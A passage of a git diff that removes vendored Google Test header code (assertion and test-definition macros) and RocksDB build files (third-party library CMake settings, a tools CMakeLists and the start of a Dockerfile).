-  if (pred(v1, v2, v3, v4)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ", "
-                            << e3 << ", "
-                            << e4 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2
-                            << "\n" << e3 << " evaluates to " << v3
-                            << "\n" << e4 << " evaluates to " << v4;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT4.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT4_(pred_format, v1, v2, v3, v4, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, #v3, #v4, v1, v2, v3, v4), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED4.  Don't use
-// this in your code.
-#define GTEST_PRED4_(pred, v1, v2, v3, v4, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred4Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             #v3, \
-                                             #v4, \
-                                             pred, \
-                                             v1, \
-                                             v2, \
-                                             v3, \
-                                             v4), on_failure)
-
-// 4-ary predicate assertion macros.
-#define EXPECT_PRED_FORMAT4(pred_format, v1, v2, v3, v4) \
-  GTEST_PRED_FORMAT4_(pred_format, v1, v2, v3, v4, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED4(pred, v1, v2, v3, v4) \
-  GTEST_PRED4_(pred, v1, v2, v3, v4, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT4(pred_format, v1, v2, v3, v4) \
-  GTEST_PRED_FORMAT4_(pred_format, v1, v2, v3, v4, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED4(pred, v1, v2, v3, v4) \
-  GTEST_PRED4_(pred, v1, v2, v3, v4, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED5.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2,
-          typename T3,
-          typename T4,
-          typename T5>
-AssertionResult AssertPred5Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  const char* e3,
-                                  const char* e4,
-                                  const char* e5,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2,
-                                  const T3& v3,
-                                  const T4& v4,
-                                  const T5& v5) {
-  if (pred(v1, v2, v3, v4, v5)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ", "
-                            << e3 << ", "
-                            << e4 << ", "
-                            << e5 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2
-                            << "\n" << e3 << " evaluates to " << v3
-                            << "\n" << e4 << " evaluates to " << v4
-                            << "\n" << e5 << " evaluates to " << v5;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT5.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT5_(pred_format, v1, v2, v3, v4, v5, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, #v3, #v4, #v5, v1, v2, v3, v4, v5), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED5.  Don't use
-// this in your code.
-#define GTEST_PRED5_(pred, v1, v2, v3, v4, v5, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred5Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             #v3, \
-                                             #v4, \
-                                             #v5, \
-                                             pred, \
-                                             v1, \
-                                             v2, \
-                                             v3, \
-                                             v4, \
-                                             v5), on_failure)
-
-// 5-ary predicate assertion macros.
-#define EXPECT_PRED_FORMAT5(pred_format, v1, v2, v3, v4, v5) \
-  GTEST_PRED_FORMAT5_(pred_format, v1, v2, v3, v4, v5, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED5(pred, v1, v2, v3, v4, v5) \
-  GTEST_PRED5_(pred, v1, v2, v3, v4, v5, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT5(pred_format, v1, v2, v3, v4, v5) \
-  GTEST_PRED_FORMAT5_(pred_format, v1, v2, v3, v4, v5, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED5(pred, v1, v2, v3, v4, v5) \
-  GTEST_PRED5_(pred, v1, v2, v3, v4, v5, GTEST_FATAL_FAILURE_)
-
-
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
-
-// Macros for testing equalities and inequalities.
-//
-//    * {ASSERT|EXPECT}_EQ(expected, actual): Tests that expected == actual
-//    * {ASSERT|EXPECT}_NE(v1, v2):           Tests that v1 != v2
-//    * {ASSERT|EXPECT}_LT(v1, v2):           Tests that v1 < v2
-//    * {ASSERT|EXPECT}_LE(v1, v2):           Tests that v1 <= v2
-//    * {ASSERT|EXPECT}_GT(v1, v2):           Tests that v1 > v2
-//    * {ASSERT|EXPECT}_GE(v1, v2):           Tests that v1 >= v2
-//
-// When they are not, Google Test prints both the tested expressions and
-// their actual values.  The values must be compatible built-in types,
-// or you will get a compiler error.  By "compatible" we mean that the
-// values can be compared by the respective operator.
-//
-// Note:
-//
-//   1. It is possible to make a user-defined type work with
-//   {ASSERT|EXPECT}_??(), but that requires overloading the
-//   comparison operators and is thus discouraged by the Google C++
-//   Usage Guide.  Therefore, you are advised to use the
-//   {ASSERT|EXPECT}_TRUE() macro to assert that two objects are
-//   equal.
-//
-//   2. The {ASSERT|EXPECT}_??() macros do pointer comparisons on
-//   pointers (in particular, C strings).  Therefore, if you use it
-//   with two C strings, you are testing how their locations in memory
-//   are related, not how their content is related.  To compare two C
-//   strings by content, use {ASSERT|EXPECT}_STR*().
-//
-//   3. {ASSERT|EXPECT}_EQ(expected, actual) is preferred to
-//   {ASSERT|EXPECT}_TRUE(expected == actual), as the former tells you
-//   what the actual value is when it fails, and similarly for the
-//   other comparisons.
-//
-//   4. Do not depend on the order in which {ASSERT|EXPECT}_??()
-//   evaluate their arguments, which is undefined.
-//
-//   5. These macros evaluate their arguments exactly once.
-//
-// Examples:
-//
-//   EXPECT_NE(5, Foo());
-//   EXPECT_EQ(NULL, a_pointer);
-//   ASSERT_LT(i, array_size);
-//   ASSERT_GT(records.size(), 0) << "There is no record left.";
-
-#define EXPECT_EQ(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal:: \
-                      EqHelper<GTEST_IS_NULL_LITERAL_(expected)>::Compare, \
-                      expected, actual)
-#define EXPECT_NE(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperNE, expected, actual)
-#define EXPECT_LE(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperLE, val1, val2)
-#define EXPECT_LT(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperLT, val1, val2)
-#define EXPECT_GE(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperGE, val1, val2)
-#define EXPECT_GT(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperGT, val1, val2)
-
-#define GTEST_ASSERT_EQ(expected, actual) \
-  ASSERT_PRED_FORMAT2(::testing::internal:: \
-                      EqHelper<GTEST_IS_NULL_LITERAL_(expected)>::Compare, \
-                      expected, actual)
-#define GTEST_ASSERT_NE(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperNE, val1, val2)
-#define GTEST_ASSERT_LE(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperLE, val1, val2)
-#define GTEST_ASSERT_LT(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperLT, val1, val2)
-#define GTEST_ASSERT_GE(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperGE, val1, val2)
-#define GTEST_ASSERT_GT(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperGT, val1, val2)
-
-// Define macro GTEST_DONT_DEFINE_ASSERT_XY to 1 to omit the definition of
-// ASSERT_XY(), which clashes with some users' own code.
-
-#if !GTEST_DONT_DEFINE_ASSERT_EQ
-# define ASSERT_EQ(val1, val2) GTEST_ASSERT_EQ(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_NE
-# define ASSERT_NE(val1, val2) GTEST_ASSERT_NE(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_LE
-# define ASSERT_LE(val1, val2) GTEST_ASSERT_LE(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_LT
-# define ASSERT_LT(val1, val2) GTEST_ASSERT_LT(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_GE
-# define ASSERT_GE(val1, val2) GTEST_ASSERT_GE(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_GT
-# define ASSERT_GT(val1, val2) GTEST_ASSERT_GT(val1, val2)
-#endif
-
-// C-string Comparisons.  All tests treat NULL and any non-NULL string
-// as different.  Two NULLs are equal.
-//
-//    * {ASSERT|EXPECT}_STREQ(s1, s2):     Tests that s1 == s2
-//    * {ASSERT|EXPECT}_STRNE(s1, s2):     Tests that s1 != s2
-//    * {ASSERT|EXPECT}_STRCASEEQ(s1, s2): Tests that s1 == s2, ignoring case
-//    * {ASSERT|EXPECT}_STRCASENE(s1, s2): Tests that s1 != s2, ignoring case
-//
-// For wide or narrow string objects, you can use the
-// {ASSERT|EXPECT}_??() macros.
-//
-// Don't depend on the order in which the arguments are evaluated,
-// which is undefined.
-//
-// These macros evaluate their arguments exactly once.
-
-#define EXPECT_STREQ(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTREQ, expected, actual)
-#define EXPECT_STRNE(s1, s2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTRNE, s1, s2)
-#define EXPECT_STRCASEEQ(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASEEQ, expected, actual)
-#define EXPECT_STRCASENE(s1, s2)\
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASENE, s1, s2)
-
-#define ASSERT_STREQ(expected, actual) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTREQ, expected, actual)
-#define ASSERT_STRNE(s1, s2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTRNE, s1, s2)
-#define ASSERT_STRCASEEQ(expected, actual) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASEEQ, expected, actual)
-#define ASSERT_STRCASENE(s1, s2)\
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASENE, s1, s2)
-
-// Macros for comparing floating-point numbers.
-//
-//    * {ASSERT|EXPECT}_FLOAT_EQ(expected, actual):
-//         Tests that two float values are almost equal.
-//    * {ASSERT|EXPECT}_DOUBLE_EQ(expected, actual):
-//         Tests that two double values are almost equal.
-//    * {ASSERT|EXPECT}_NEAR(v1, v2, abs_error):
-//         Tests that v1 and v2 are within the given distance to each other.
-//
-// Google Test uses ULP-based comparison to automatically pick a default
-// error bound that is appropriate for the operands.  See the
-// FloatingPoint template class in gtest-internal.h if you are
-// interested in the implementation details.
-
-#define EXPECT_FLOAT_EQ(expected, actual)\
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<float>, \
-                      expected, actual)
-
-#define EXPECT_DOUBLE_EQ(expected, actual)\
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<double>, \
-                      expected, actual)
-
-#define ASSERT_FLOAT_EQ(expected, actual)\
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<float>, \
-                      expected, actual)
-
-#define ASSERT_DOUBLE_EQ(expected, actual)\
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<double>, \
-                      expected, actual)
-
-#define EXPECT_NEAR(val1, val2, abs_error)\
-  EXPECT_PRED_FORMAT3(::testing::internal::DoubleNearPredFormat, \
-                      val1, val2, abs_error)
-
-#define ASSERT_NEAR(val1, val2, abs_error)\
-  ASSERT_PRED_FORMAT3(::testing::internal::DoubleNearPredFormat, \
-                      val1, val2, abs_error)
-
-// These predicate format functions work on floating-point values, and
-// can be used in {ASSERT|EXPECT}_PRED_FORMAT2*(), e.g.
-//
-//   EXPECT_PRED_FORMAT2(testing::DoubleLE, Foo(), 5.0);
-
-// Asserts that val1 is less than, or almost equal to, val2.  Fails
-// otherwise.  In particular, it fails if either val1 or val2 is NaN.
-GTEST_API_ AssertionResult FloatLE(const char* expr1, const char* expr2,
-                                   float val1, float val2);
-GTEST_API_ AssertionResult DoubleLE(const char* expr1, const char* expr2,
-                                    double val1, double val2);
-
-
-#if GTEST_OS_WINDOWS
-
-// Macros that test for HRESULT failure and success, these are only useful
-// on Windows, and rely on Windows SDK macros and APIs to compile.
-//
-//    * {ASSERT|EXPECT}_HRESULT_{SUCCEEDED|FAILED}(expr)
-//
-// When expr unexpectedly fails or succeeds, Google Test prints the
-// expected result and the actual result with both a human-readable
-// string representation of the error, if available, as well as the
-// hex result code.
-# define EXPECT_HRESULT_SUCCEEDED(expr) \
-    EXPECT_PRED_FORMAT1(::testing::internal::IsHRESULTSuccess, (expr))
-
-# define ASSERT_HRESULT_SUCCEEDED(expr) \
-    ASSERT_PRED_FORMAT1(::testing::internal::IsHRESULTSuccess, (expr))
-
-# define EXPECT_HRESULT_FAILED(expr) \
-    EXPECT_PRED_FORMAT1(::testing::internal::IsHRESULTFailure, (expr))
-
-# define ASSERT_HRESULT_FAILED(expr) \
-    ASSERT_PRED_FORMAT1(::testing::internal::IsHRESULTFailure, (expr))
-
-#endif  // GTEST_OS_WINDOWS
-
-// Macros that execute statement and check that it doesn't generate new fatal
-// failures in the current thread.
-//
-//   * {ASSERT|EXPECT}_NO_FATAL_FAILURE(statement);
-//
-// Examples:
-//
-//   EXPECT_NO_FATAL_FAILURE(Process());
-//   ASSERT_NO_FATAL_FAILURE(Process()) << "Process() failed";
-//
-#define ASSERT_NO_FATAL_FAILURE(statement) \
-    GTEST_TEST_NO_FATAL_FAILURE_(statement, GTEST_FATAL_FAILURE_)
-#define EXPECT_NO_FATAL_FAILURE(statement) \
-    GTEST_TEST_NO_FATAL_FAILURE_(statement, GTEST_NONFATAL_FAILURE_)
-
-// Causes a trace (including the source file path, the current line
-// number, and the given message) to be included in every test failure
-// message generated by code in the current scope.  The effect is
-// undone when the control leaves the current scope.
-//
-// The message argument can be anything streamable to std::ostream.
-//
-// In the implementation, we include the current line number as part
-// of the dummy variable name, thus allowing multiple SCOPED_TRACE()s
-// to appear in the same block - as long as they are on different
-// lines.
-#define SCOPED_TRACE(message) \
-  ::testing::internal::ScopedTrace GTEST_CONCAT_TOKEN_(gtest_trace_, __LINE__)(\
-    __FILE__, __LINE__, ::testing::Message() << (message))
-
-// Compile-time assertion for type equality.
-// StaticAssertTypeEq<type1, type2>() compiles iff type1 and type2 are
-// the same type.  The value it returns is not interesting.
-//
-// Instead of making StaticAssertTypeEq a class template, we make it a
-// function template that invokes a helper class template.  This
-// prevents a user from misusing StaticAssertTypeEq<T1, T2> by
-// defining objects of that type.
-//
-// CAVEAT:
-//
-// When used inside a method of a class template,
-// StaticAssertTypeEq<T1, T2>() is effective ONLY IF the method is
-// instantiated.  For example, given:
-//
-//   template <typename T> class Foo {
-//    public:
-//     void Bar() { testing::StaticAssertTypeEq<int, T>(); }
-//   };
-//
-// the code:
-//
-//   void Test1() { Foo<bool> foo; }
-//
-// will NOT generate a compiler error, as Foo<bool>::Bar() is never
-// actually instantiated.  Instead, you need:
-//
-//   void Test2() { Foo<bool> foo; foo.Bar(); }
-//
-// to cause a compiler error.
-template <typename T1, typename T2>
-bool StaticAssertTypeEq() {
-  (void)internal::StaticAssertTypeEqHelper<T1, T2>();
-  return true;
-}
-
-// Defines a test.
-//
-// The first parameter is the name of the test case, and the second
-// parameter is the name of the test within the test case.
-//
-// The convention is to end the test case name with "Test".  For
-// example, a test case for the Foo class can be named FooTest.
-//
-// Test code should appear between braces after an invocation of
-// this macro.  Example:
-//
-//   TEST(FooTest, InitializesCorrectly) {
-//     Foo foo;
-//     EXPECT_TRUE(foo.StatusIsOK());
-//   }
-
-// Note that we call GetTestTypeId() instead of GetTypeId<
-// ::testing::Test>() here to get the type ID of testing::Test.  This
-// is to work around a suspected linker bug when using Google Test as
-// a framework on Mac OS X.  The bug causes GetTypeId<
-// ::testing::Test>() to return different values depending on whether
-// the call is from the Google Test framework itself or from user test
-// code.  GetTestTypeId() is guaranteed to always return the same
-// value, as it always calls GetTypeId<>() from the Google Test
-// framework.
-#define GTEST_TEST(test_case_name, test_name)\
-  GTEST_TEST_(test_case_name, test_name, \
-              ::testing::Test, ::testing::internal::GetTestTypeId())
-
-// Define this macro to 1 to omit the definition of TEST(), which
-// is a generic name and clashes with some other libraries.
-#if !GTEST_DONT_DEFINE_TEST
-# define TEST(test_case_name, test_name) GTEST_TEST(test_case_name, test_name)
-#endif
-
-// Defines a test that uses a test fixture.
-//
-// The first parameter is the name of the test fixture class, which
-// also doubles as the test case name.  The second parameter is the
-// name of the test within the test case.
-//
-// A test fixture class must be declared earlier.  The user should put
-// his test code between braces after using this macro.  Example:
-//
-//   class FooTest : public testing::Test {
-//    protected:
-//     virtual void SetUp() { b_.AddElement(3); }
-//
-//     Foo a_;
-//     Foo b_;
-//   };
-//
-//   TEST_F(FooTest, InitializesCorrectly) {
-//     EXPECT_TRUE(a_.StatusIsOK());
-//   }
-//
-//   TEST_F(FooTest, ReturnsElementCountCorrectly) {
-//     EXPECT_EQ(0, a_.size());
-//     EXPECT_EQ(1, b_.size());
-//   }
-
-#define TEST_F(test_fixture, test_name)\
-  GTEST_TEST_(test_fixture, test_name, test_fixture, \
-              ::testing::internal::GetTypeId<test_fixture>())
-
-}  // namespace testing
-
-// Use this function in main() to run all tests.  It returns 0 if all
-// tests are successful, or 1 otherwise.
-//
-// RUN_ALL_TESTS() should be invoked after the command line has been
-// parsed by InitGoogleTest().
-//
-// This function was formerly a macro; thus, it is in the global
-// namespace and has an all-caps name.
-int RUN_ALL_TESTS() GTEST_MUST_USE_RESULT_;
-
-inline int RUN_ALL_TESTS() {
-  return ::testing::UnitTest::GetInstance()->Run();
-}
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_H_
diff --git a/thirdparty/rocksdb/thirdparty.inc b/thirdparty/rocksdb/thirdparty.inc
deleted file mode 100644
index a364d1d..0000000
--- a/thirdparty/rocksdb/thirdparty.inc
+++ /dev/null
@@ -1,254 +0,0 @@
-# Edit definitions below to specify paths to include files and libraries of all 3rd party libraries
-
-#
-# Edit these lines to set defaults for use of external libraries
-#
-set(USE_GFLAGS_DEFAULT 0)        # GFLAGS is disabled by default, enable with -DGFLAGS=1 cmake command line agrument
-set(USE_SNAPPY_DEFAULT 0)        # SNAPPY is disabled by default, enable with -DSNAPPY=1 cmake command line agrument
-set(USE_LZ4_DEFAULT 0)           # LZ4 is disabled by default, enable with -DLZ4=1 cmake command line agrument
-set(USE_ZLIB_DEFAULT 0)          # ZLIB is disabled by default, enable with -DZLIB=1 cmake command line agrument
-set(USE_XPRESS_DEFAULT 0)        # XPRESS is disabled by default, enable with -DXPRESS=1 cmake command line agrument
-
-#
-# This example assumes all the libraries locate in directories under THIRDPARTY_HOME environment variable
-# Set environment variable THIRDPARTY_HOME to point to your third party libraries home (Unix style dir separators)
-# or change the paths below to reflect where the libraries actually reside
-#
-set (THIRDPARTY_LIBS "")         # Initialization, don't touch
-
-#
-# Edit these 4 lines to define paths to GFLAGS
-#
-set(GFLAGS_HOME $ENV{THIRDPARTY_HOME}/Gflags.Library)
-set(GFLAGS_INCLUDE ${GFLAGS_HOME}/inc/include)
-set(GFLAGS_LIB_DEBUG ${GFLAGS_HOME}/bin/debug/amd64/gflags.lib)
-set(GFLAGS_LIB_RELEASE ${GFLAGS_HOME}/bin/retail/amd64/gflags.lib)
-
-# ================================================== GFLAGS ==================================================
-#
-# Don't touch these lines
-#
-if (DEFINED GFLAGS)
-  set(USE_GFLAGS ${GFLAGS})
-else ()
-  set(USE_GFLAGS ${USE_GFLAGS_DEFAULT})
-endif ()
-
-if (${USE_GFLAGS} EQUAL 1)
-  message(STATUS "GFLAGS library is enabled")
-  
-  if(DEFINED ENV{GFLAGS_INCLUDE})
-    set(GFLAGS_INCLUDE $ENV{GFLAGS_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{GFLAGS_LIB_DEBUG})
-    set(GFLAGS_LIB_DEBUG $ENV{GFLAGS_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{GFLAGS_LIB_RELEASE})
-    set(GFLAGS_LIB_RELEASE $ENV{GFLAGS_LIB_RELEASE})
-  endif()
-  
-  set(GFLAGS_CXX_FLAGS -DGFLAGS=gflags)
-  set(GFLAGS_LIBS debug ${GFLAGS_LIB_DEBUG} optimized ${GFLAGS_LIB_RELEASE})
-
-  add_definitions(${GFLAGS_CXX_FLAGS})
-  include_directories(${GFLAGS_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${GFLAGS_LIBS})
-else ()
-  message(STATUS "GFLAGS library is disabled")
-endif ()
-
-# ================================================== SNAPPY ==================================================
-#
-# Edit these 4 lines to define paths to Snappy
-#
-set(SNAPPY_HOME $ENV{THIRDPARTY_HOME}/Snappy.Library)
-set(SNAPPY_INCLUDE ${SNAPPY_HOME}/inc/inc)
-set(SNAPPY_LIB_DEBUG ${SNAPPY_HOME}/bin/debug/amd64/snappy.lib)
-set(SNAPPY_LIB_RELEASE ${SNAPPY_HOME}/bin/retail/amd64/snappy.lib)
-
-#
-# Don't touch these lines
-#
-if (DEFINED SNAPPY)
-  set(USE_SNAPPY ${SNAPPY})
-else ()
-  set(USE_SNAPPY ${USE_SNAPPY_DEFAULT})
-endif ()
-
-if (${USE_SNAPPY} EQUAL 1)
-  message(STATUS "SNAPPY library is enabled")
-  
-  if(DEFINED ENV{SNAPPY_INCLUDE})
-    set(SNAPPY_INCLUDE $ENV{SNAPPY_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{SNAPPY_LIB_DEBUG})
-    set(SNAPPY_LIB_DEBUG $ENV{SNAPPY_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{SNAPPY_LIB_RELEASE})
-    set(SNAPPY_LIB_RELEASE $ENV{SNAPPY_LIB_RELEASE})
-  endif()
-  
-  set(SNAPPY_CXX_FLAGS -DSNAPPY)
-  set(SNAPPY_LIBS debug ${SNAPPY_LIB_DEBUG} optimized ${SNAPPY_LIB_RELEASE})
-
-  add_definitions(${SNAPPY_CXX_FLAGS})
-  include_directories(${SNAPPY_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${SNAPPY_LIBS})
-else ()
-  message(STATUS "SNAPPY library is disabled")
-endif ()
-
-# ================================================== LZ4 ==================================================
-#
-# Edit these 4 lines to define paths to LZ4
-#
-set(LZ4_HOME $ENV{THIRDPARTY_HOME}/LZ4.Library)
-set(LZ4_INCLUDE ${LZ4_HOME}/inc/include)
-set(LZ4_LIB_DEBUG ${LZ4_HOME}/bin/debug/amd64/lz4.lib)
-set(LZ4_LIB_RELEASE ${LZ4_HOME}/bin/retail/amd64/lz4.lib)
-
-#
-# Don't touch these lines
-#
-if (DEFINED LZ4)
-  set(USE_LZ4 ${LZ4})
-else ()
-  set(USE_LZ4 ${USE_LZ4_DEFAULT})
-endif ()
-
-if (${USE_LZ4} EQUAL 1)
-  message(STATUS "LZ4 library is enabled")
-  
-  if(DEFINED ENV{LZ4_INCLUDE})
-    set(LZ4_INCLUDE $ENV{LZ4_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{LZ4_LIB_DEBUG})
-    set(LZ4_LIB_DEBUG $ENV{LZ4_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{LZ4_LIB_RELEASE})
-    set(LZ4_LIB_RELEASE $ENV{LZ4_LIB_RELEASE})
-  endif()
-  
-  set(LZ4_CXX_FLAGS -DLZ4)
-  set(LZ4_LIBS debug ${LZ4_LIB_DEBUG} optimized ${LZ4_LIB_RELEASE})
-
-  add_definitions(${LZ4_CXX_FLAGS})
-  include_directories(${LZ4_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${LZ4_LIBS})
-else ()
-  message(STATUS "LZ4 library is disabled")
-endif ()
-
-# ================================================== ZLIB ==================================================
-#
-# Edit these 4 lines to define paths to ZLIB
-#
-set(ZLIB_HOME $ENV{THIRDPARTY_HOME}/ZLIB.Library)
-set(ZLIB_INCLUDE ${ZLIB_HOME}/inc/include)
-set(ZLIB_LIB_DEBUG ${ZLIB_HOME}/bin/debug/amd64/zlib.lib)
-set(ZLIB_LIB_RELEASE ${ZLIB_HOME}/bin/retail/amd64/zlib.lib)
-
-#
-# Don't touch these lines
-#
-if (DEFINED ZLIB)
-  set(USE_ZLIB ${ZLIB})
-else ()
-  set(USE_ZLIB ${USE_ZLIB_DEFAULT})
-endif ()
-
-if (${USE_ZLIB} EQUAL 1)
-  message(STATUS "ZLIB library is enabled")
-
-  if(DEFINED ENV{ZLIB_INCLUDE})
-    set(ZLIB_INCLUDE $ENV{ZLIB_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{ZLIB_LIB_DEBUG})
-    set(ZLIB_LIB_DEBUG $ENV{ZLIB_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{ZLIB_LIB_RELEASE})
-    set(ZLIB_LIB_RELEASE $ENV{ZLIB_LIB_RELEASE})
-  endif()
-  
-  set(ZLIB_CXX_FLAGS -DZLIB)
-  set(ZLIB_LIBS debug ${ZLIB_LIB_DEBUG} optimized ${ZLIB_LIB_RELEASE})
-
-  add_definitions(${ZLIB_CXX_FLAGS})
-  include_directories(${ZLIB_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${ZLIB_LIBS})
-else ()
-  message(STATUS "ZLIB library is disabled")
-endif ()
-
-if (DEFINED XPRESS)
-  set(USE_XPRESS ${XPRESS})
-else ()
-  set(USE_XPRESS ${USE_XPRESS_DEFAULT})
-endif ()
-
-if (${USE_XPRESS} EQUAL 1)
-  message(STATUS "XPRESS is enabled")
-
-  add_definitions(-DXPRESS)
-  
-  # We are using the implementation provided by the system
-  set (SYSTEM_LIBS ${SYSTEM_LIBS} Cabinet.lib)
-else ()
-  message(STATUS "XPRESS is disabled")
-endif ()
-
-#
-# Edit these 4 lines to define paths to Jemalloc
-#
-set(JEMALLOC_HOME $ENV{THIRDPARTY_HOME}/Jemalloc.Library)
-set(JEMALLOC_INCLUDE ${JEMALLOC_HOME}/inc/include)
-set(JEMALLOC_LIB_DEBUG ${JEMALLOC_HOME}/bin/debug/amd64/jemalloc.lib)
-set(JEMALLOC_LIB_RELEASE ${JEMALLOC_HOME}/bin/retail/amd64/jemalloc.lib)
-
-# ================================================== JEMALLOC ==================================================
-#
-# Don't touch these lines
-#
-
-# For compatibilty with previous
-if(JEMALLOC)
-  set(WITH_JEMALLOC ON)
-endif()
-
-if (WITH_JEMALLOC)
-  message(STATUS "JEMALLOC library is enabled")
-  set(JEMALLOC_CXX_FLAGS "-DROCKSDB_JEMALLOC -DJEMALLOC_EXPORT= ")
-  
-  if(DEFINED ENV{JEMALLOC_INCLUDE})
-    set(JEMALLOC_INCLUDE $ENV{JEMALLOC_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{JEMALLOC_LIB_DEBUG})
-    set(JEMALLOC_LIB_DEBUG $ENV{JEMALLOC_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{JEMALLOC_LIB_RELEASE})
-    set(JEMALLOC_LIB_RELEASE $ENV{JEMALLOC_LIB_RELEASE})
-  endif()
-
-  set(JEMALLOC_LIBS debug ${JEMALLOC_LIB_DEBUG} optimized ${JEMALLOC_LIB_RELEASE})
-
-  add_definitions(${JEMALLOC_CXX_FLAGS})
-  include_directories(${JEMALLOC_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${JEMALLOC_LIBS})
-  set (ARTIFACT_SUFFIX "_je")
-  
-  set(WITH_JEMALLOC ON)
-  
-else ()
-  set (ARTIFACT_SUFFIX "")
-  message(STATUS "JEMALLOC library is disabled")
-endif ()
diff --git a/thirdparty/rocksdb/tools/CMakeLists.txt b/thirdparty/rocksdb/tools/CMakeLists.txt
deleted file mode 100644
index 6c4733a..0000000
--- a/thirdparty/rocksdb/tools/CMakeLists.txt
+++ /dev/null
@@ -1,21 +0,0 @@
-set(TOOLS
-  sst_dump.cc
-  db_sanity_test.cc
-  db_stress.cc
-  write_stress.cc
-  ldb.cc
-  db_repl_stress.cc
-  dump/rocksdb_dump.cc
-  dump/rocksdb_undump.cc)
-foreach(src ${TOOLS})
-  get_filename_component(exename ${src} NAME_WE)
-  add_executable(${exename}${ARTIFACT_SUFFIX}
-    ${src})
-  target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${LIBS})
-  list(APPEND tool_deps ${exename})
-endforeach()
-add_custom_target(tools
-  DEPENDS ${tool_deps})
-add_custom_target(ldb_tests
-  COMMAND python ${CMAKE_CURRENT_SOURCE_DIR}/ldb_tests.py
-  DEPENDS ldb)
diff --git a/thirdparty/rocksdb/tools/Dockerfile b/thirdparty/rocksdb/tools/Dockerfile
deleted file mode 100644
index 1d5ead7..0000000
--- a/thirdparty/rocksdb/tools/Dockerfile
+++ /dev/null
@@ -1,5 +0,0 @@
-FROM buildpack-deps:wheezy
-
